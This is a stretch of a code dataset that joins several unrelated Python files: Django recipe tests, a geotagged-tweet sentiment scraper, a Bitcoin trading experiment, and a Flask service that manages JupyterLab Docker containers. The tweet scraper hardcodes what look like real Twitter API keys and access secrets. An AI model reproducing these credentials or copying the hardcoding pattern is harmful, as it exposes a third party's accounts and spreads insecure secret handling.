Lab/WKNN/rssi_vs_distance_graph.py","file_name":"rssi_vs_distance_graph.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"510989694","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom django.test import TestCase\nfrom cooking.models.Recipe import Recipe\nfrom cooking.tests import util\n\n__author__ = 'sarace'\n\n\nclass RecipeMethodsTests(TestCase):\n\n    def test_create_recipe(self):\n        \"\"\"\n        Test the creation of a recipe\n        :return:\n        \"\"\"\n        util.create_test_recipe()\n        new_recipe = Recipe.objects.get(name='Tarte Tatin')\n        self.assertTrue(new_recipe.id is not None)\n        self.assertTrue(new_recipe.global_time == 55)\n        self.assertTrue(new_recipe.preparation_time == 15)\n        self.assertTrue(new_recipe.costs == 1)\n        self.assertTrue(new_recipe.user_mod == 'user_test')\n        self.assertTrue(new_recipe.num_people == 6)\n\n    def test_update_recipe(self):\n        \"\"\"\n        Update a recipe, save it and test if the changes were done.\n        :return:\n        \"\"\"\n        recipe = util.create_test_recipe()\n        old_recipe_id = recipe.id\n        old_recipe_global_time = recipe.global_time\n        recipe.global_time = 60\n        recipe.save()\n        new_recipe = Recipe.objects.get(name='Tarte Tatin')\n        self.assertTrue(old_recipe_id == new_recipe.id)\n        self.assertFalse(old_recipe_global_time == new_recipe.global_time)\n\n\n    def test_delete_recipe(self):\n        with self.assertRaises(ObjectDoesNotExist):\n            \"\"\"\n            Delete a recipe and check if it is not anymore in the DB\n            :return:\n            \"\"\"\n            recipe = util.create_test_recipe()\n            recipe_id = recipe.id\n            recipe.delete()\n            deleted_recipe = 
Recipe.objects.get(pk=recipe_id)\n","sub_path":"cooking/tests/RecipeTests.py","file_name":"RecipeTests.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"386609711","text":"import time, csv, sys, io, re\ntry:\n\timport twitter\n\tfrom textblob import TextBlob\nexcept ImportError:\n\tprint(\"ERROR MESSAGE:\")\n\tprint(\"You should have twitter-python api installed.\")\n\tprint(\"You should have textblob api installed.\")\n\tprint(\"You should have csv api installed.\")\n\tprint(\"You should have io api installed.\")\n\tprint(\"You should have re api installed.\")\n\tprint(\"You should have time api installed.\")\n\ndef clean_tweet(string):\n\t# Turns out that Text blob handles emoticons for sentiment analysis as well.\n\t# So there is no need to replace emoticons.\n\t#cleaning tweets for some well known abbreviations and removing special characters.\n\t#removing hyperlinks as well as Twitter is attaching the Tweet link after the Tweet text.\n\tstring = re.sub(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', '', string)\n\tstring = re.sub(r'\\bthats\\b', 'that is', string)\n\tstring = re.sub(r'\\bive\\b', 'i have', string)\n\tstring = re.sub(r'\\bim\\b', 'i am', string)\n\tstring = re.sub(r'\\bya\\b', 'yeah', string)\n\tstring = re.sub(r'\\bcant\\b', 'can not', string)\n\tstring = re.sub(r'\\bwont\\b', 'will not', string)\n\tstring = re.sub(r'\\bid\\b', 'i would', string)\n\tstring = re.sub(r'wtf', 'what the fuck', string)\n\tstring = re.sub(r'\\bwth\\b', 'what the hell', string)\n\tstring = re.sub(r'\\br\\b', 'are', string)\n\tstring = re.sub(r'\\bu\\b', 'you', string)\n\tstring = re.sub(r'\\bk\\b', 'OK', string)\n\tstring = re.sub(r'\\bsux\\b', 'sucks', string)\n\tstring = re.sub(r'\\bno+\\b', 'no', string)\n\tstring = re.sub(r'\\bcoo+\\b', 'cool', string)\n\t#no need to remove emoticons\n\t#string = re.sub(r'\\b:\\)\\b', 'good', string)\n\t#string = re.sub(r'\\b:D\\b', 'good', string)\n\t#string = re.sub(r'\\b:\\(\\b', 'sad', string)\n\t#string = re.sub(r'\\b:-\\)\\b', 'good', string)\n\t#string = re.sub(r'\\b=\\)\\b', 'good', string)\n\t#string = re.sub(r'\\b\\(:\\b', 'good', string)\n\t#string = re.sub(r'\\b:\\\\\\b', 'annoyed', string)\n\treturn string\n\n#Python has some serious problems with non ascii characters.\ndef strip_non_ascii(string):\n\t#removing the non ascii characters from the string because Python has a lot of encoding problems\n\t''' Returns the string without non ASCII characters'''\n\tstripped = (c for c in string if 0 < ord(c) < 127)\n\treturn ''.join(stripped)\n\n#TO get the runtime of the program, can be ignored.\nstart_time = time.time()\n#Access keys for the Twitter API\nconsumer_key = 'DGh9KwPCvFwmOGHoBajHaCEIP'\nconsumer_secret = 'h5nGxUW36rKDYyXJF2bJRHafLOmPwOO6hPqWAraDNMh3j0DUWc'\naccess_token = '963536281165803520-NQzBRAIa13bjmIYd2cEmgDKqgvFY3JP'\naccess_secret = 'lp2Hu3FOdJ5Z563Isb7VCUtTk2UwH03LLummrYskunnd3'\n\n#40.7127° N, -74.0134° W One World Trade Center\n#37.8199° N, -122.4783° W Golden Gate Bridge\n#Getting the Latitude and Longitude from Google Places API\noutfile = \"tweets.csv\"\nlatitude = 37.8199\nlongitude = -122.4783\nkm_range = 1000\nnum_results = 100\n\n#auth = OAuthHandler(consumer_key, consumer_secret)\n#auth.set_access_token(access_token, access_secret)\n\n#twitter = Twitter(\n#\tauth = OAuth(access_token, access_secret, consumer_key, consumer_secret)) \n#Authentication for the Twitter API\ntry:\n\tapi = 
twitter.Api(consumer_key, consumer_secret, access_token, access_secret)\nexcept:\n\tprint(\"ERROR MESSAGE: \")\n\tprint(\"Authentication Failed. Do something!!!!\")\n\n#Indexing and opening the CSV file to store the tweets in\n#Stream API can also work.\ntry:\n\tindexer = [\"User\", \"Tweet\", \"Latitude\", \"Longitude\", \"Sentiment\", \"ID\"]\n\tcsvfile = open(outfile,\"w\")\n\tcsvwriter = csv.writer(csvfile)\n\tcsvwriter.writerow(indexer)\nexcept:\n\tprint(\"ERROR MESSAGE: \")\n\tprint(\"cannot open the csv file to save the tweets.\")\n\n#Main Program starts here,\n#api = tweepy.API(auth)\n#for status in tweepy.Cursor(api.home_timeline).items(100):\n   # with io.open(\"lol.txt\", \"w+\", encoding = 'utf-8') as f:\n   # \tf.write(status.text)\n#f.close()\ntry:\n\tglobal last_id\n\tresult_count= 0\n\tlast_id = None\n\tquery = api.GetSearch(geocode = (latitude, longitude, \"100mi\"), count=512, max_id = last_id)\n\tprint(len(query))\nexcept: \n\tprint(\"ERROR MESSAGE: \")\n\tprint(\"Not able to query the twitter API. \")\n\tprint(\"Check Connection.\")\n#total count is the number of tweets we have\n#needed_tweets is the number of tweets we need\n#we call the api until we get the amount of tweets that we need.\ntotal_count = 1\nneeded_tweets = 1000\nwhile(total_count < needed_tweets):\n\tquery = api.GetSearch(geocode = (latitude, longitude, \"100mi\"), count=512, max_id = last_id)\n\tfor result in query:\n\t\tuser = result.user.screen_name\n\t\tans = strip_non_ascii(result.text)\n\t\tans = clean_tweet(ans.lower())\n\t\tsetup = TextBlob(ans).sentiment.polarity\n\t\tif setup >= 0.1:\n\t\t\tpolarity = 'positive'\n\t\telif setup <= -0.1:\n\t\t\tpolarity = 'negative'\n\t\telse:\n\t\t\tpolarity = 'neutral'\n\t\t#print(polarity)\n\t\t#last_id gets the last ID of the tweet that was found in the last iteration\n\t\tif(not(last_id)):\n\t\t\tlast_id = result.id\n\t\telse:\n\t\t\tlast_id = min(result.id, last_id)\n\t\t#we use last ID so that we do not get past tweets again and again\n\t\tID = result.id\n\t\t#print(str(last_id) +\"\t + str(ID))\n\t\trow = [user, ans, latitude, longitude, polarity, ID]\n\t\tcsvwriter.writerow(row)\n\t\ttotal_count += 1\n\t\t#Still getting same tweets again and again.\n\t\t#Twitter API is not giving access to old tweets I suppose. 
Maybe the result of a Standard Licence API?\n\t\t#print(result.full_text)\n\t\t#if(result[\"geo\"]):\n\t\t#\tuser = result[\"user\"][\"screen_name\"]\n\t\t#\ttext = result[\"text\"]\n\t\t#\tt=text\n\t\t#\ttext = str(t)\n\t\t#\tlatituded = result[\"geo\"][\"coordinates\"][0]\n\t\t#\tlongituded = result[\"geo\"][\"coordinates\"][1\n\t\t#\t#-----------------------------------------------------------------------\n\t\t#\t# now write this row to our CSV file\n\t\t\t#-----------------------------------------------------------------------\n\t\t#\trow = [ user, text, latituded, longituded[] ]\n\t\t#\tcsvwriter.writerow(row)\n\t\t#\tresult_count += 1\n\t\t#\tlast_id = result[\"id\"]\n\t\t#print(\"%d tweets received as of now\"%(count))\n\t#total_count+=count\n\t#print(\"%d is the total amount of tweets received.\"%(total_count))\ncsvfile.close()\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n\n\n\n#[6918 rows x 3 columns]\n#Accuracy 0.837236195432\n#Precision 0.894869638352","sub_path":"other/Tweet_Sentiment.py","file_name":"Tweet_Sentiment.py","file_ext":"py","file_size_in_byte":6246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"134819001","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as md\nimport sys\n\nsys.path.insert(0, \"../../../Data/src/ReadData\")\nimport RRL as RRL\nimport regDataSets as data\nimport dataProcessing as proc\n\n\n# parameters\ndataPath = \"../../../Data/\"\nfileName = dataPath + \"bcEUR.csv.gz\"\n\nstartTimes = [9.46771200e+08, 1.4005e9]\nendTimes = [1.4e9, 1.431e9]\n\nsmoothWindow = 30\ntimeScale = 3\n\nNtrain = 1\nNderivs = 2 \t\t\t# consider past point in decision\ntimePerBin = 500 \t# number of seconds per bin\ntrainSteps = 500\nNtimeBins_train = 20\nNtimeBins_test = 20\nlearningRate = .7\nLRdecay = 0.8\nreg = 0.0\n\nfee = 0.0025\n\n\n####\tImport Data ####\ndataSets = data.importData(fileName, startTimes, endTimes)\n\n# Rebin the data\nprint(len(dataSets))\ntime_train, price_train = proc.binner(dataSets[0], timePerBin, NtimeBins_train)\ntime_test, price_test = proc.binner(dataSets[1], timePerBin, NtimeBins_test)\n\n# Final price array to be used\nX_train = proc.smoother(time_train, price_train, smoothWindow, timeScale)\nX_test = proc.smoother(time_test, price_test, smoothWindow, timeScale)\n\n# Indicator (+-1) of the price from n-1 to n at index n\nY_train = data.getYvalues(X_train)\nY_test = data.getYvalues(X_test)\n\n# BTC price change rate between NN bins\nbtcRate_train = np.zeros(NtimeBins_train - 1 - Nderivs)\nbtcRate_test = np.zeros(NtimeBins_test - 1 - Nderivs)\n \nfor itm in range(Nderivs+1, NtimeBins_test):\n btcRate_test[itm-1-Nderivs] = X_test[itm]/X_test[itm-1] - 1.0\n\nfor itm in range(Nderivs+1, NtimeBins_train):\n btcRate_train[itm-1-Nderivs] = X_train[itm]/X_train[itm-1] - 1.0\n\n\n#### Make Features ####\n\n# Calculate derivatives\nderivs_train = RRL.derivatives(X_train, Nderivs)\nderivs_test = RRL.derivatives(X_test, Nderivs)\n\nfeatures_train = derivs_train\nfeatures_test = derivs_test\n\n#### Resize ####\ntime_train = time_train[Nderivs+1:-1]\nprice_train = price_train[Nderivs+1:-1]\ntime_test = time_test[Nderivs+1:-1]\nprice_test = price_test[Nderivs+1:-1]\n\nX_train = X_train[Nderivs+1:-1]\nX_test = X_test[Nderivs+1:-1]\nY_train = Y_train[Nderivs+1:-1]\nY_test = Y_test[Nderivs+1:-1]\n\nfeatures_train = features_train[:-1]\nfeatures_test = features_test[:-1]\n\n\n###########################\n#### Train The Model 
####\n###########################\n\ntheta = np.zeros(np.size(features_train,1))\nwealth_train = np.zeros(np.size(features_train,0))\n\n#### Training ####\nfor itm in range(1, Ntrain+1):\n theta = RRL.RRLearning(features_train, theta, learningRate, btcRate_train, fee)\n learningRate = learningRate*LRdecay\n\n#### Calculate Profit ####\ncorrectRate = 0;\nbuyThresh = 0\nsellThresh = 0\nprofit_train = np.zeros(np.size(features_train, 0))\nprofit_train[0] = 1.\nFarr_train = np.zeros(np.size(features_train, 0))\nfor itm in range(0,np.size(features_train, 0)):\n Farr_train[itm] = (1.0 + np.tanh(np.dot(theta, features_train[itm,:])))/2.0\n\nfor itm in range(1, np.size(features_train, 0)):\n correctRate += (np.sign(Y_train[itm]*(Farr_train[itm] - 0.5)) + 1.0)/2.0\n profit_train[itm] = profit_train[itm-1]*(1.0 + Farr_train[itm]*btcRate_train[itm])*(1.0 - fee*np.abs(Farr_train[itm] - Farr_train[itm-1]))\n\nprint(\"!!!!! TRAINING RESULTS !!!!!\")\nprint(\" log profit of \" + str(profit_train[np.size(features_train, 0)-1]))\n\ncorrectRate = (correctRate/np.size(features_train, 0))\nprint(\" correct rate: \" + str(correctRate))\n\n\n##########################\n#### Test The Model ####\n##########################\n\ncorrectRate = 0\nprofit_test = np.zeros(np.size(features_test, 0))\nprofit_test[0] = 1.0\n\nFarr_test = np.zeros(np.size(features_test,0))\nfor itm in range(0,np.size(features_test,0)):\n Farr_test[itm] = (1.0 + np.tanh(np.dot(theta, features_test[itm,:])))/2.0\n\nfor itm in range(1, np.size(features_test,0)):\n correctRate += (np.sign(Y_test[itm]*(Farr_test[itm] - 0.5)) + 1.0)/2.0\n profit_test[itm] = profit_test[itm-1]*(1.0 + Farr_test[itm]*btcRate_test[itm])*(1.0 - fee*np.abs(Farr_test[itm] - Farr_test[itm-1]))\n\ncorrectRate = (correctRate/np.size(features_test, 0))\n\nprint(\"!!!!! 
TESTING RESULTS !!!!!\")\nprint(\" log test profit of \" + str(profit_test[np.size(features_test, 0) - 1]))\nprint(\" correct rate: \" + str(correctRate))\n\nprint(\"\\n\\nFinal test/train cumulative weighted confidence\\n\"\n +\"\\t\"+str(profit_test[-1])+\" / \"+str(profit_train[-2])+\" \"\n +str(np.log10(profit_test[-1]))+\" / \"+str(np.log10(profit_train[-2])));\n\n\n########################\n#### Plot Results ####\n########################\n\nfig, ax = plt.subplots(figsize=(7,5))\n\ntime_train /= 86400\ntime_test /= 86400\n\nprint(time_train.shape, profit_train.shape)\ntplt1, = ax.plot(time_train, profit_train, 'b', label='Train', linewidth=2.5)\ntplt2, = ax.plot(time_test, profit_test, 'k', label='Test', linewidth=2.5)\nax.set_xlabel('Time [days]', fontweight='bold')\nax.set_ylabel('Cumulative Weighted Confidence', fontweight='bold')\nax.semilogy()\n\nlgnd = ax.legend(handles=[tplt1, tplt2], title='Recurrent RL', loc='lower right', fancybox=True)\nplt.setp(lgnd.get_title(), fontsize='large', fontweight='bold')\nax.grid()\nplt.show()\nfig.savefig(\"rrlTestvTrain.png\", format='png')\n\n","sub_path":"Learning/src/RRL/run_RRL.py","file_name":"run_RRL.py","file_ext":"py","file_size_in_byte":5084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"507069013","text":"from utils.logger import TermLogger,AverageMeter\nfrom validation import val\nfrom train import train\nimport time\ndef main():\n '''\n TermLogger demo\n 训练框架\n :return:\n '''\n epochs = 15\n train_size=10#batchs for train\n valid_size = 6\n\n logger = TermLogger(n_epochs=epochs,\n train_size=train_size,\n valid_size=valid_size)\n logger.reset_epoch_bar()\n\n\n #first val\n first_val = True\n val_losses = AverageMeter(precision=3)\n if first_val:\n val_names,val_losses = val(logger)\n else:\n val_loss = 0\n\n logger.reset_epoch_bar()\n #logger.epoch_logger_update(epoch=0,display)\n\n logger.epoch_bar.update(epoch=0)\n logger.epoch_writer.write('---\\n---\\n---')\n epoch_time = AverageMeter()\n\n\n\n end = time.time()\n for epoch in range(1,epochs):\n\n train_names,train_losses=train(logger)\n\n val_names,val_losses=val(logger)\n\n epoch_time.update(time.time()-end)\n end = time.time()\n\n\n logger.reset_train_bar()\n logger.reset_valid_bar()\n\n #if log_terminal\n logger.epoch_logger_update(epoch=epoch,time=epoch_time,names=val_names,values=val_losses)\n\n logger.epoch_bar.finish()\n print('over')\nif __name__ =='__main__':\n main()","sub_path":"tutorials/train_val_framework/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"120555068","text":"'''\nCreated on 12 Feb, 2020\n\n@author: Tim Kreuzer\n'''\n\nimport subprocess\n\nfrom flask import request\nfrom flask_restful import Resource\nfrom flask import current_app as app\n\nfrom app import utils_common, utils_file_loads, jlab_utils\nimport os\nfrom pathlib import Path\n\nclass JupyterLabHandler(Resource):\n def get(self):\n try:\n \"\"\"\n Headers:\n Intern-Authorization: spawner_token\n uuidcode\n Containername: uuidcode_from_spawn \n \"\"\"\n # Track actions through different webservices.\n uuidcode = request.headers.get('uuidcode', '')\n app.log.info(\"uuidcode={} - Get JupyterLab Status\".format(uuidcode))\n app.log.trace(\"uuidcode={} - Headers: {}\".format(uuidcode, request.headers))\n \n # Check for the J4J intern token\n utils_common.validate_auth(app.log,\n uuidcode,\n 
request.headers.get('intern-authorization', None))\n \n request_headers = {}\n for key, value in request.headers.items():\n if 'Token' in key: # refresh, jhub, access\n key = key.replace('-', '_')\n request_headers[key.lower()] = value\n containername = request_headers.get(\"containername\")\n cmd1 = [\"docker\", \"ps\", \"-q\", \"-f\", \"name={}\".format(containername)]\n try:\n app.log.trace(\"uuidcode={} - Cmd: {}\".format(uuidcode, cmd1))\n ret = subprocess.check_output(cmd1, stderr=subprocess.STDOUT, timeout=5)\n ret = ret.strip().decode(\"utf-8\")\n app.log.trace(\"uuidcode={} - Output: {}\".format(uuidcode, ret))\n except:\n app.log.exception(\"uuidcode={} - Could not check docker status. Return True\".format(uuidcode))\n return \"True\", 200\n if ret == \"\":\n return \"False\", 200\n else:\n cmd2 = [\"docker\", \"ps\", \"-aq\", \"-f\", \"status=exited\", \"-f\", \"name={}\".format(containername)]\n try:\n app.log.trace(\"uuidcode={} - Cmd: {}\".format(uuidcode, cmd2))\n ret = subprocess.check_output(cmd2, stderr=subprocess.STDOUT, timeout=5)\n ret = ret.strip().decode(\"utf-8\")\n app.log.trace(\"uuidcode={} - Output: {}\".format(uuidcode, ret))\n except:\n app.log.exception(\"uuidcode={} - Could not check docker status. Return True\".format(uuidcode))\n return \"True\", 200\n if ret == \"\":\n # it's running\n return \"True\", 200\n else:\n # cleanup. Container status=exited\n cmd3 = [\"docker\", \"rm\", containername]\n try:\n app.log.trace(\"uuidcode={} - Cmd: {}\".format(uuidcode, cmd3))\n ret = subprocess.check_output(cmd3, stderr=subprocess.STDOUT, timeout=5)\n ret = ret.strip().decode(\"utf-8\")\n app.log.trace(\"uuidcode={} - Output: {}\".format(uuidcode, ret))\n except:\n app.log.exception(\"uuidcode={} - Could not cleanup non running container. Return False\".format(uuidcode))\n return \"False\", 200\n return \"False\", 200\n except:\n app.log.exception(\"JLab.get failed. 
Bugfix required\")\n            return '', 500\n\n    def post(self):\n        try:\n            \"\"\"\n            Headers:\n                Intern-Authorization: spawner_token\n                uuidcode\n                accesstoken\n                expire\n            Body:\n                email\n                environments\n                image\n                port\n                servername\n                jupyterhub_api_url\n            Config:\n                basefolder # /etc/j4j/j4j_hdfcloud\n                network\n                cap-add\n                memory\n                memory-swap\n                device\n                storage-opt \n            \"\"\"\n            # Track actions through different webservices.\n            uuidcode = request.headers.get('uuidcode', '')\n            app.log.info(\"uuidcode={} - Start JupyterLab\".format(uuidcode))\n            app.log.trace(\"uuidcode={} - Headers: {}\".format(uuidcode, request.headers))\n            app.log.trace(\"uuidcode={} - Json: {}\".format(uuidcode, request.json))\n            \n            # Check for the J4J intern token\n            utils_common.validate_auth(app.log,\n                                       uuidcode,\n                                       request.headers.get('intern-authorization', None))\n            \n            request_headers = {}\n            for key, value in request.headers.items():\n                if 'Token' in key: # refresh, jhub, access\n                    key = key.replace('-', '_')\n                request_headers[key.lower()] = value\n            request_json = {}\n            for key, value in request.json.items():\n                if 'Token' in key: # refresh, jhub, access\n                    key = key.replace('-', '_')\n                request_json[key.lower()] = value\n            app.log.trace(\"uuidcode={} - New Headers: {}\".format(uuidcode, request_headers))\n            app.log.trace(\"uuidcode={} - New Json: {}\".format(uuidcode, request_json))\n            \n            if \"SERVICELEVEL\" in request_json.get(\"environments\", {}).keys():\n                config = utils_file_loads.get_servicelevel_config(request_json.get(\"environments\", {}).get(\"SERVICELEVEL\", \"default\"))\n            else:\n                config = utils_file_loads.get_general_config()\n            basefolder = config.get('basefolder', '')\n            userfolder = os.path.join(basefolder, request_json.get('email').replace(\"@\", \"_at_\"))\n            serverfolder = Path(os.path.join(userfolder, '.{}'.format(uuidcode)))\n            mounts = jlab_utils.get_mounts(app.log, uuidcode, serverfolder, userfolder)\n            \n            cmd = [\"timeout\", \"{}\".format(config.get('timeout', '30d')), \"docker\", \"run\"]\n            cmd.append(\"--network\")\n            cmd.append(config.get(\"network\"))\n            cmd.append(\"--cap-add\")\n            cmd.append(config.get(\"cap-add\"))\n            cmd.append(\"--memory\")\n            cmd.append(config.get(\"memory\"))\n            cmd.append(\"--memory-swap\")\n            cmd.append(config.get(\"memory-swap\"))\n            cmd.append(\"--device\")\n            cmd.append(config.get(\"device\"))\n            cmd.append(\"--storage-opt\")\n            cmd.append(config.get(\"storage-opt\"))\n            cmd.append(\"--name\")\n            cmd.append(uuidcode)\n            cmd.append(\"-e\")\n            cmd.append(\"{}={}\".format(\"HPCACCOUNTS\", request_json.get(\"environments\",{}).get(\"HPCACCOUNTS\", \"\")))\n            cmd.append(\"-e\")\n            cmd.append(\"{}={}\".format(\"JUPYTERHUB_API_URL\", request_json.get(\"environments\",{}).get(\"JUPYTERHUB_API_URL\", \"\")))\n            cmd.append(\"-e\")\n            cmd.append(\"{}={}\".format(\"JUPYTERHUB_CLIENT_ID\", request_json.get(\"environments\",{}).get(\"JUPYTERHUB_CLIENT_ID\", \"\")))\n            cmd.append(\"-e\")\n            cmd.append(\"{}={}\".format(\"JUPYTERHUB_API_TOKEN\", request_json.get(\"environments\",{}).get(\"JUPYTERHUB_API_TOKEN\", \"\")))\n            cmd.append(\"-e\")\n            cmd.append(\"{}={}\".format(\"JUPYTERHUB_USER\", request_json.get(\"environments\",{}).get(\"JUPYTERHUB_USER\", \"\")))\n            cmd.append(\"-e\")\n            cmd.append(\"{}={}\".format(\"JUPYTERHUB_SERVICE_PREFIX\", request_json.get(\"environments\",{}).get(\"JUPYTERHUB_SERVICE_PREFIX\", \"\")))\n            cmd.append(\"-e\")\n            cmd.append(\"{}={}\".format(\"JUPYTERHUB_BASE_URL\", request_json.get(\"environments\",{}).get(\"JUPYTERHUB_BASE_URL\", \"\")))\n            cmd.append(\"-e\")\n            
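# NOTE: a minimal refactoring sketch (untested; not part of the original file): the
# repeated cmd.append("-e") / cmd.append("KEY=VALUE") pairs above and below could be
# generated in one loop over the expected environment keys, e.g.
#     for key in ("HPCACCOUNTS", "JUPYTERHUB_API_URL", "JUPYTERHUB_CLIENT_ID",
#                 "JUPYTERHUB_API_TOKEN", "JUPYTERHUB_USER",
#                 "JUPYTERHUB_SERVICE_PREFIX", "JUPYTERHUB_BASE_URL"):
#         cmd += ["-e", "{}={}".format(key, request_json.get("environments", {}).get(key, ""))]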
cmd.append(\"{}={}\".format(\"UNITYJSCACCESSTOKEN\", request.headers.get(\"accesstoken\", \"\")))\n cmd.append(\"-e\")\n cmd.append(\"{}={}\".format(\"UNITYJSCACCESSTOKENEXPIRATION\", request.headers.get(\"expire\", \"\")))\n cmd.extend(mounts)\n cmd.append(request_json.get(\"image\"))\n cmd.append(\"/home/jovyan/.start.sh\")\n cmd.append(str(request_json.get(\"port\")))\n cmd.append(request_json.get(\"servername\"))\n cmd.append(request_json.get(\"jupyterhub_api_url\"))\n #if request_json.get(\"service\", \"\").lower() == \"dashboard\":\n # cmd.append(request_json.get())\n cmd.append(\"&\")\n app.log.debug(\"uuidcode={} - Run Command: {}\".format(uuidcode, cmd))\n subprocess.Popen(cmd)\n except:\n app.log.exception(\"JLab.post failed. Bugfix required\")\n return \"\", 500\n return \"\", 202\n\n def delete(self):\n \"\"\"\n Headers:\n Intern-Authorization: spawner_token\n uuidcode\n containername: uuidcode from spawn\n \"\"\"\n try:\n # Track actions through different webservices.\n uuidcode = request.headers.get('uuidcode', '')\n app.log.info(\"uuidcode={} - Delete JupyterLab\".format(uuidcode))\n app.log.trace(\"uuidcode={} - Headers: {}\".format(uuidcode, request.headers))\n \n # Check for the J4J intern token\n utils_common.validate_auth(app.log,\n uuidcode,\n request.headers.get('intern-authorization', None))\n request_headers = {}\n for key, value in request.headers.items():\n if 'Token' in key: # refresh, jhub, access\n key = key.replace('-', '_')\n request_headers[key.lower()] = value \n containername = request_headers.get('containername')\n cmd1 = [\"docker\", \"container\", \"exec\", containername, \"/bin/umount\", \"/home/jovyan/B2DROP\"]\n cmd2 = [\"docker\", \"container\", \"exec\", containername, \"/bin/fusermount\", \"-u\", \"/home/jovyan/HPCMOUNT\"]\n cmd3 = [\"docker\", \"container\", \"rm\", \"--force\", containername]\n try:\n app.log.trace(\"uuidcode={} - Cmd: {}\".format(uuidcode, cmd1))\n ret = subprocess.check_output(cmd1, stderr=subprocess.STDOUT, timeout=5)\n ret = ret.strip().decode(\"utf-8\")\n app.log.trace(\"uuidcode={} - Output: {}\".format(uuidcode, ret))\n except:\n app.log.warning(\"uuidcode={} - Could not unmount B2DROP\".format(uuidcode))\n try:\n app.log.trace(\"uuidcode={} - Cmd: {}\".format(uuidcode, cmd2))\n ret = subprocess.check_output(cmd2, stderr=subprocess.STDOUT, timeout=5)\n ret = ret.strip().decode(\"utf-8\")\n app.log.trace(\"uuidcode={} - Output: {}\".format(uuidcode, ret))\n except:\n app.log.warning(\"uuidcode={} - Could not unmount HPCMOUNT\".format(uuidcode))\n try:\n app.log.trace(\"uuidcode={} - Cmd: {}\".format(uuidcode, cmd3))\n ret = subprocess.check_output(cmd3, stderr=subprocess.STDOUT, timeout=5)\n ret = ret.strip().decode(\"utf-8\")\n app.log.trace(\"uuidcode={} - Output: {}\".format(uuidcode, ret))\n except:\n app.log.exception(\"uuidcode={} - Could not stop container\".format(uuidcode))\n \n except:\n app.log.exception(\"JLabs.delete failed. 
Bugfix required\")\n return '', 500\n return '', 202\n","sub_path":"app/jlab.py","file_name":"jlab.py","file_ext":"py","file_size_in_byte":11688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"350185766","text":"import datetime\nfrom django.conf import settings\nfrom django.utils import timezone\nimport os\n\nfrom eulfedora.views import datastream_etag\nfrom eulfedora.server import Repository\nfrom eulfedora.util import RequestFailed\n\nfrom readux.annotations.models import Annotation\nfrom readux.books.models import Volume, VolumeV1_0, Page, PageV1_0\nfrom readux.utils import solr_interface, md5sum\n\n'''\nConditional methods for calculating last modified time and ETags\nfor view methods in :mod:`readux.books.views`.\n\n.. Note::\n\n In many cases, the Solr indexing timestamp is used rather than the object\n modification time, as this may account for changes to the site or indexing\n (including adding pages to a volume that is otherwise unchanged).\n'''\n\n\ndef volumes_modified(request, *args, **kwargs):\n 'last modification time for all volumes'\n solr = solr_interface()\n results = solr.query(content_model=VolumeV1_0.VOLUME_CONTENT_MODEL) \\\n .sort_by('-timestamp').field_limit('timestamp')\n # NOTE: using solr indexing timestamp instead of object last modified, since\n # if an object's index has changed it may have been modified\n\n # if user is logged in, changes in annotation totals result\n # in volume page display modifications\n latest_note = None\n if request.user.is_authenticated():\n latest_note = Annotation.objects.visible_to(request.user) \\\n .last_created_time()\n\n solrtime = results[0]['timestamp'] if results.count() else None\n return solrtimestamp_or_datetime(solrtime, latest_note)\n\n\ndef volume_modified(request, pid):\n 'last modification time for a single volume'\n solr = solr_interface()\n results = solr.query(content_model=VolumeV1_0.VOLUME_CONTENT_MODEL,\n pid=pid) \\\n .sort_by('-timestamp').field_limit('timestamp')\n # NOTE: using solr indexing timestamp instead of object last modified, since\n # if an object's index has changed it may have been modified,\n # and index timestamp for a volume will be updated when pages are added\n\n # if a user is logged in, page should show as modified\n # when annotation count changes\n latest_note = None\n if request.user.is_authenticated():\n # NOTE: shouldn't be very expensive to init volume here; not actually\n # making any api calls, just using volume to get volume\n # uri and associated annotations\n repo = Repository()\n vol = repo.get_object(pid, type=Volume)\n # newest annotation creation for pages in this volume\n latest_note = vol.annotations().visible_to(request.user) \\\n .last_created_time()\n\n solrtime = results[0]['timestamp'] if results.count() else None\n return solrtimestamp_or_datetime(solrtime, latest_note)\n\n\ndef volume_pages_modified(request, pid):\n '''Last modification time for a single volume or its pages, or for\n any annotations of those pages.'''\n solr = solr_interface()\n repo = Repository()\n vol = repo.get_object(pid, type=Volume)\n\n # NOTE: some overlap with Volume find_solr_pages method...\n results = solr.query((solr.Q(content_model=Volume.VOLUME_CMODEL_PATTERN) & solr.Q(pid=pid)) | \\\n (solr.Q(content_model=Page.PAGE_CMODEL_PATTERN) & solr.Q(isConstituentOf=vol.uri))) \\\n .sort_by('-timestamp').field_limit('timestamp')\n\n # NOTE: using solr indexing timestamp instead of object last modified, since\n # if an object's index has 
changed it may have been modified,\n # and index timestamp for a volume will be updated when pages are added\n\n # Page could also be modified based on annotations of the pages.\n # We only show total counts per page, so might not be modified if the\n # total number has not changed, but simplest just to get last modification\n # date in case of changes.\n # Note that this does NOT account for annotation deletions.\n\n # if a user is logged in, page should show as modified\n # based on annotations\n # Only displaying annotation *count* so creation time should\n # be sufficient. (Does not take into account deletions...)\n latest_note = None\n if request.user.is_authenticated():\n # get annotations for pages in this volume\n try:\n latest_note = vol.annotations().visible_to(request.user) \\\n .last_created_time()\n except Annotation.DoesNotExist:\n # no notes for this volume\n pass\n\n solrtime = results[0]['timestamp'] if results.count() else None\n return solrtimestamp_or_datetime(solrtime, latest_note)\n\n\ndef page_modified(request, vol_pid, pid):\n 'last modification time for a single page'\n solr = solr_interface()\n # TODO: use volume pid in query\n results = solr.query(content_model=PageV1_0.PAGE_CONTENT_MODEL,\n 